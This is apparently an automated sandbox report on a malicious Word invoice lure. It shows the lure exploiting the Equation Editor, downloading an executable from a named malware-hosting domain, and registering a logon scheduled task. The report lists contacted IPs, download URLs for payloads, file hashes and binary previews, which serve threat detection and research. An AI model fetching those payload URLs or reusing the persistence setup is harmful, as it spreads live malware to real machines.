http://www.pkioverheid.nl/policies/root-policy0	powiuytrewasfdfghjkl.exe, 00000007.00000002.2403337468.0000000008030000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://repository.swisssign.com/0	powiuytrewasfdfghjkl.exe, 00000007.00000002.2403337468.0000000008030000.00000004.00000001.sdmp	false		high
http://mail.privateemail.com	powiuytrewasfdfghjkl.exe, 00000007.00000002.2398744222.0000000002526000.00000004.00000001.sdmp	false		high
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	powiuytrewasfdfghjkl.exe, 00000007.00000002.2401436587.000000000649E000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	powiuytrewasfdfghjkl.exe, 00000004.00000002.2146683123.00000000055B0000.00000002.00000001.sdmp, powiuytrewasfdfghjkl.exe, 00000007.00000002.2400845972.0000000005C80000.00000002.00000001.sdmp	false		high
http://tempuri.org/databaseSystemDataSet.xsd	powiuytrewasfdfghjkl.exe, powiuytrewasfdfghjkl.exe, 00000007.00000000.2141889640.00000000000F2000.00000020.00020000.sdmp, E6RVLMWo0fz1jFA[1].exe.2.dr	false	Avira URL Cloud: safe	unknown
http://www.%s.comPA	powiuytrewasfdfghjkl.exe, 00000004.00000002.2146683123.00000000055B0000.00000002.00000001.sdmp, powiuytrewasfdfghjkl.exe, 00000007.00000002.2400845972.0000000005C80000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://www.trustdst.com/certificates/policy/ACES-index.html0	powiuytrewasfdfghjkl.exe, 00000007.00000002.2403369507.0000000008056000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ocsp.entrust.net0D	powiuytrewasfdfghjkl.exe, 00000007.00000002.2401436587.000000000649E000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powiuytrewasfdfghjkl.exe, 00000004.00000002.2143227299.00000000021E1000.00000004.00000001.sdmp	false		high
https://secure.comodo.com/CPS0	powiuytrewasfdfghjkl.exe, 00000007.00000002.2401436587.000000000649E000.00000004.00000001.sdmp	false		high
https://www.netlock.net/docs	powiuytrewasfdfghjkl.exe, 00000007.00000002.2401574275.000000000657F000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl	powiuytrewasfdfghjkl.exe, 00000007.00000002.2403337468.0000000008030000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	powiuytrewasfdfghjkl.exe	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://servername/isapibackend.dll	powiuytrewasfdfghjkl.exe, 00000007.00000002.2403439988.0000000008380000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://crl.entrust.net/2048ca.crl0	powiuytrewasfdfghjkl.exe, 00000007.00000002.2401436587.000000000649E000.00000004.00000001.sdmp	false		high
http://www.e-trust.be/CPS/QNcerts	powiuytrewasfdfghjkl.exe, 00000007.00000002.2403337468.0000000008030000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
43.252.37.193	unknown	Malaysia		45144	NETONBOARD-MYNetOnboardSdnBhd-QualityReliableCloud	true
198.54.122.60	unknown	United States		22612	NAMECHEAP-NETUS	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	348459
Start date:	04.02.2021
Start time:	09:04:27
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	PROFORMA INVOICE-09765434.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winDOC@8/15@11/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 0.9% (good quality ratio 0.7%) Quality average: 53.3% Quality standard deviation: 34%
HCA Information:	Successful, ratio: 100% Number of executed functions: 64 Number of non-executed functions: 8
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe Excluded IPs from analysis (whitelisted): 13.107.4.50, 93.184.221.240 Excluded domains from analysis (whitelisted): wu.ec.azureedge.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, wu.azureedge.net, afdap.au.au-msedge.net, au.au-msedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, au.c-0001.c-msedge.net, elasticShed.au.au-msedge.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:04:38	API Interceptor	444x Sleep call for process: EQNEDT32.EXE modified
09:05:04	API Interceptor	1345x Sleep call for process: powiuytrewasfdfghjkl.exe modified
09:05:06	API Interceptor	1x Sleep call for process: schtasks.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
43.252.37.193	New ORDER 092134..doc	Get hash	malicious	Browse	globalteamacademy.com/docct/dj/fBqZ0SFcHFfoBIY.exe
	RFQ A50924-E001.doc	Get hash	malicious	Browse	globalteamacademy.com/epl/zi/SAM.exe
	quotation085312456.doc	Get hash	malicious	Browse	globalteamacademy.com/epl/pll/PALLS.exe
	STEELWORKS RFQ-38166.doc	Get hash	malicious	Browse	globalteamacademy.com/epl/ja/JASP.exe
198.54.122.60	New ORDER 092134..doc	Get hash	malicious	Browse
	i0K5YoZXLi.exe	Get hash	malicious	Browse
	STEELWORKS RFQ-38166.doc	Get hash	malicious	Browse
	DHL............097HFRGJLK0877IKF.xlsx	Get hash	malicious	Browse
	POinv00393.exe	Get hash	malicious	Browse
	DHL_document11022020680908911.doc.exe	Get hash	malicious	Browse
	Pending Orders Statement -40064778.doc	Get hash	malicious	Browse
	documenting.doc	Get hash	malicious	Browse
	RFQ Tengco_270121.doc	Get hash	malicious	Browse
	74725794.exe	Get hash	malicious	Browse
	pickup receipt,DOC.exe	Get hash	malicious	Browse
	Pi_74725794.exe	Get hash	malicious	Browse
	74725794.exe	Get hash	malicious	Browse
	New FedEx paper work review.exe	Get hash	malicious	Browse
	New paper work document attached.exe	Get hash	malicious	Browse
	DHL_AWB_1928493383.exe	Get hash	malicious	Browse
	PGXPHWCclJQdkUDcrlQETWlRbmXQw.exe	Get hash	malicious	Browse
	SecuriteInfo.com.BehavesLike.Win32.Generic.tc.exe	Get hash	malicious	Browse
	gc2hl6HPAVH5h1p.exe	Get hash	malicious	Browse
	DHL7472579410110100.PDF.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
globalteamacademy.com	New ORDER 092134..doc	Get hash	malicious	Browse	43.252.37.193
	RFQ A50924-E001.doc	Get hash	malicious	Browse	43.252.37.193
	quotation085312456.doc	Get hash	malicious	Browse	43.252.37.193
	STEELWORKS RFQ-38166.doc	Get hash	malicious	Browse	43.252.37.193
mail.privateemail.com	New ORDER 092134..doc	Get hash	malicious	Browse	198.54.122.60
	i0K5YoZXLi.exe	Get hash	malicious	Browse	198.54.122.60
	STEELWORKS RFQ-38166.doc	Get hash	malicious	Browse	198.54.122.60
	ORDER-876545.exe	Get hash	malicious	Browse	198.54.122.60
	DHL............097HFRGJLK0877IKF.xlsx	Get hash	malicious	Browse	198.54.122.60
	QuotationTXCtyres.exe	Get hash	malicious	Browse	198.54.122.60
	POinv00393.exe	Get hash	malicious	Browse	198.54.122.60
	DHL_document11022020680908911.doc.exe	Get hash	malicious	Browse	198.54.122.60
	Pending Orders Statement -40064778.doc	Get hash	malicious	Browse	198.54.122.60
	documenting.doc	Get hash	malicious	Browse	198.54.122.60
	RFQ Tengco_270121.doc	Get hash	malicious	Browse	198.54.122.60
	74725794.exe	Get hash	malicious	Browse	198.54.122.60
	Enq No 34 22-01-2021.exe	Get hash	malicious	Browse	198.54.122.60
	pickup receipt,DOC.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.BehavesLike.Win32.Generic.lm.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.BehavesLike.Win32.Generic.nm.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.BehavesLike.Win32.Generic.lm.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.BehavesLike.Win32.Trojan.nm.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.BehavesLike.Win32.Generic.nm.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.BehavesLike.Win32.Generic.qm.exe	Get hash	malicious	Browse	198.54.122.60

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
NAMECHEAP-NETUS	New ORDER 092134..doc	Get hash	malicious	Browse	198.54.122.60
	PO#4503527426.xlsx	Get hash	malicious	Browse	198.54.117.216
	SAMSUNG C&T UPCOMING PROJECTS19-MP.exe.exe	Get hash	malicious	Browse	198.54.117.212
	i0K5YoZXLi.exe	Get hash	malicious	Browse	198.54.122.60
	LbxEsmtt9T.exe	Get hash	malicious	Browse	198.54.117.210
	IRS_Microsoft_Excel_Document_xls.jar	Get hash	malicious	Browse	198.187.29.67
	KROS Sp. z.o.o.exe	Get hash	malicious	Browse	198.54.117.212
	STEELWORKS RFQ-38166.doc	Get hash	malicious	Browse	198.54.122.60
	Nre Order.exe	Get hash	malicious	Browse	185.61.154.56
	DHL............097HFRGJLK0877IKF.xlsx	Get hash	malicious	Browse	198.54.122.60
	DHL Delivery.exe	Get hash	malicious	Browse	198.54.114.191
	ZoZPSenk67.exe	Get hash	malicious	Browse	199.188.200.97
	swift copy.exe	Get hash	malicious	Browse	198.54.126.106
	M0uy4pgQzd.exe	Get hash	malicious	Browse	198.54.117.211
	file OEM file.xlsx	Get hash	malicious	Browse	198.54.126.106
	WaybillDoc_6848889025.xlsx	Get hash	malicious	Browse	198.54.126.106
	SOA 2.doc	Get hash	malicious	Browse	198.54.117.216
	PO_Invoices_pdf.exe	Get hash	malicious	Browse	199.193.7.228
	winlog.exe	Get hash	malicious	Browse	162.0.229.112
	MV Huanghai Pioneer TK-812B.exe	Get hash	malicious	Browse	198.54.116.236
NETONBOARD-MYNetOnboardSdnBhd-QualityReliableCloud	New ORDER 092134..doc	Get hash	malicious	Browse	43.252.37.193
	RFQ A50924-E001.doc	Get hash	malicious	Browse	43.252.37.193
	quotation085312456.doc	Get hash	malicious	Browse	43.252.37.193
	STEELWORKS RFQ-38166.doc	Get hash	malicious	Browse	43.252.37.193
	PAYMENT 25SW Aug-06-2018.doc	Get hash	malicious	Browse	182.239.42.250

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe
File Type:	Microsoft Cabinet archive data, 59134 bytes, 1 file
Category:	dropped
Size (bytes):	59134
Entropy (8bit):	7.995450161616763
Encrypted:	true
SSDEEP:	1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
MD5:	E92176B0889CC1BB97114BEB2F3C1728
SHA1:	AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
SHA-256:	58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
SHA-512:	CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7I.....e..Y..Rq...3.n..u..............\|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b.....[...L..c..a..,...E5X..i.d..w.....#o+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.084754685484955
Encrypted:	false
SSDEEP:	6:kKDsFNhbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:7sFu3kPlE99SNxAhUeo+aKt
MD5:	5CC0FB95DE0F829E7D7A3690398508F8
SHA1:	784F46BBC5C33F2C02A10EEB1212A7E2EED584C3
SHA-256:	B15434470A6A24AE42E06486F323703B4B9809DCF1D0E4C2DF6B32F2C6867110
SHA-512:	D1BD6BE7011000E2676FAEEC051499891AD042FE0DF20609C6BBE9598B1E47924AA3C7C4A48F35161B11FC19BC3735B16AC4A246A2A5A5E5C7A58AA1AC82FA02
Malicious:	false
Reputation:	low
Preview:	p...... ........q...&...(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\E6RVLMWo0fz1jFA[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	1079808
Entropy (8bit):	7.53477738688699
Encrypted:	false
SSDEEP:	12288:VKKMUipAhZHRAX0WG1nQQ5dTFX93W3z4GJmMc07EUbOFdnL2PFIq5QXKS8:VKKNewrAXPGhHhX9m3sGJW2zb+seq68
MD5:	AA1F1EEBD208B4A2BC51CBD86C0E4FB0
SHA1:	C8E21DB93E1A7F550E2D090DE7EC91DE25464CCF
SHA-256:	4BD15467CE260CB5A4F9B8C9176369E0CAC646A96E2BA564A077F4E7190331A2
SHA-512:	6C33B781A35D2AF18C18A9D074BB7D2DB4DA93586C1ECC665DA4C1AE55226374B0A0B81CAEEC2ECB8FF24FCBFEA315F577674F4B3324B7A8B029BE0DA7851CA7
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
IE Cache URL:	http://globalteamacademy.com/docct/uzz/E6RVLMWo0fz1jFA.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5.`..............P..^...........}... ........@.. ....................................@..................................\|..O.......0............................................................................ ............... ..H............text....]... ...^.................. ..`.rsrc...0............`..............@..@.reloc...............x..............@..B.................\|......H............j..........................................................0............(,...(-.........(.....o..........................(/......(0......(1......(2......(3....N..(....o....(4....&..(5.....s6........s7........s8........s9........s:............0...........~....o;....+...0...........~....o<....+...0...........~....o=....+...0...........~....o>....+...0...........~....o?....+..&..(@....*...0..<........~.....(A.....,!r...p.....(B...oC...sD............~.....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{68A5A67A-6F93-4194-97B0-E6749671AC21}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E42C9A4D-C73B-45F3-859A-E103BFD96442}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	1.0776351207167147
Encrypted:	false
SSDEEP:	6:Qc/ZZiKwwNgREqAWlgFJw/jlll8vlw2FrA:Qc/ZZ5wwk5uFJwbuvq2ZA
MD5:	29710E565D9AC78295841E65D292B2FE
SHA1:	4CF4B9163F879EF45F6F2CD14751027EE3D6E111
SHA-256:	9F987CC503F0F210D0B5155EFEBCFE14C4654EE45FF49F0F0BF5EFD334187A09
SHA-512:	5DEE62248D64ECA2163120FEEC0560887840AF28D0BFADDF7D547C448537AD670CD5C903798480A0D7C9D7898E237B9ED44C4B25A9F3F1B31665F9AC5AAB6E89
Malicious:	false
Reputation:	low
Preview:	3.4.7.9.2.6.9.5. . . . . . . . . . . . . . . . . . .7.0.9.0. . . . . . . . . . . . . . . . . . .7.0.9.0. . . . . . . . . . . . . . . . . . . .7.0.9.0.7.0.9.0.\.=....... .E.q.u.a.t.i.o.n...3.E.M.B.E.D.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j....CJ..OJ..QJ..U..^J..aJ

C:\Users\user\AppData\Local\Temp\Cab5B7B.tmp Download File
Process:	C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe
File Type:	Microsoft Cabinet archive data, 59134 bytes, 1 file
Category:	dropped
Size (bytes):	59134
Entropy (8bit):	7.995450161616763
Encrypted:	true
SSDEEP:	1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
MD5:	E92176B0889CC1BB97114BEB2F3C1728
SHA1:	AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
SHA-256:	58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
SHA-512:	CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7I.....e..Y..Rq...3.n..u..............\|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b.....[...L..c..a..,...E5X..i.d..w.....#o+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.

C:\Users\user\AppData\Local\Temp\Tar5B7C.tmp Download File
Process:	C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe
File Type:	data
Category:	modified
Size (bytes):	152788
Entropy (8bit):	6.316654432555028
Encrypted:	false
SSDEEP:	1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
MD5:	64FEDADE4387A8B92C120B21EC61E394
SHA1:	15A2673209A41CCA2BC3ADE90537FE676010A962
SHA-256:	BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
SHA-512:	655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	0..T....H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0.......`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o

C:\Users\user\AppData\Local\Temp\tmpE966.tmp Download File
Process:	C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1621
Entropy (8bit):	5.148308777985936
Encrypted:	false
SSDEEP:	24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBItn:cbhZ7ClNQi/rydbz9I3YODOLNdq34
MD5:	2A42A7893F19089D8BB01566316D2C97
SHA1:	1282EC5AB561606A58E225B2CBE2CCA145F638E6
SHA-256:	CB9E9C8A7B35B641FCF4BE0C74C437B0C7CA53EA15A888FE38BAC01B5B1A4155
SHA-512:	75E2AEBA1B42B87A37DA9B5947EA3DB02775A4914CCD5A230351AEFFD12312CF3CCEC8F162CE9E4E0B22E615F11327520D76025A2B5AC26BB69411E1B5D5AFA1
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PROFORMA INVOICE-09765434.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Aug 26 14:08:15 2020, atime=Thu Feb 4 16:04:36 2021, length=3597, window=hide
Category:	dropped
Size (bytes):	2178
Entropy (8bit):	4.584307703200378
Encrypted:	false
SSDEEP:	48:8s/XT0jFPBJjVHr+00jVQWQh2s/XT0jFPBJjVHr+00jVQWQ/:8s/XojFPBH5qQWQh2s/XojFPBH5qQWQ/
MD5:	392642A8D310CAAB387E6DD10F4B1A89
SHA1:	131BA0CBAA2D0969A67F82D798CFF304F4F6394C
SHA-256:	09F0FAF274A1B5DAED3814BF3A25B45C678CBD75D979803FF2262F9DFAD3C76E
SHA-512:	D5C72A69F314A9CF4EF4AF437825B76DDCABB56D0E4934C8141A8A7FA037B165F922F961B52AC4B2FB972AE94B106EA646124B2B664B2D18A7230036D0A2DA50
Malicious:	false
Preview:	L..................F.... ...jK.{..jK.{...,...................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....DR.. .PROFOR~1.DOC..h.......Q.y.Q.y...8.....................P.R.O.F.O.R.M.A. .I.N.V.O.I.C.E.-.0.9.7.6.5.4.3.4...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\813435\Users.user\Desktop\PROFORMA INVOICE-09765434.doc.4.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.R.O.F.O.R.M.A. .I.N.V.O.I.C.E.-.0.9.7.6.5.4.3.4...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	113
Entropy (8bit):	4.830042183455617
Encrypted:	false
SSDEEP:	3:M19XoMKigkcRWb5otawoMKigkcRWb5omX19XoMKigkcRWb5ov:MQMXgbkmadMXgbkCMXgbky
MD5:	E9800DB710241EE893F25BCD884E8842
SHA1:	619C47C3AAA18FD61971319603D7000D5228D22E
SHA-256:	E90D8A150DD8F37C1B1F2A9EDDDAA308B8F419A35C6B3D751AD014DCBEA4FF80
SHA-512:	800D0677591EAE3877330EBF199B1F7185A9C4DE83F1526A79AD7F458F49F0139293F32143301CB1D0EF2BACB43F6A4A4A12A0F3C3E604F95ADA9C386C0D47F6
Malicious:	false
Preview:	[doc]..PROFORMA INVOICE-09765434.LNK=0..PROFORMA INVOICE-09765434.LNK=0..[doc]..PROFORMA INVOICE-09765434.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
MD5:	4A5DFFE330E8BBBF59615CB0C71B87BE
SHA1:	7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
SHA-256:	D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
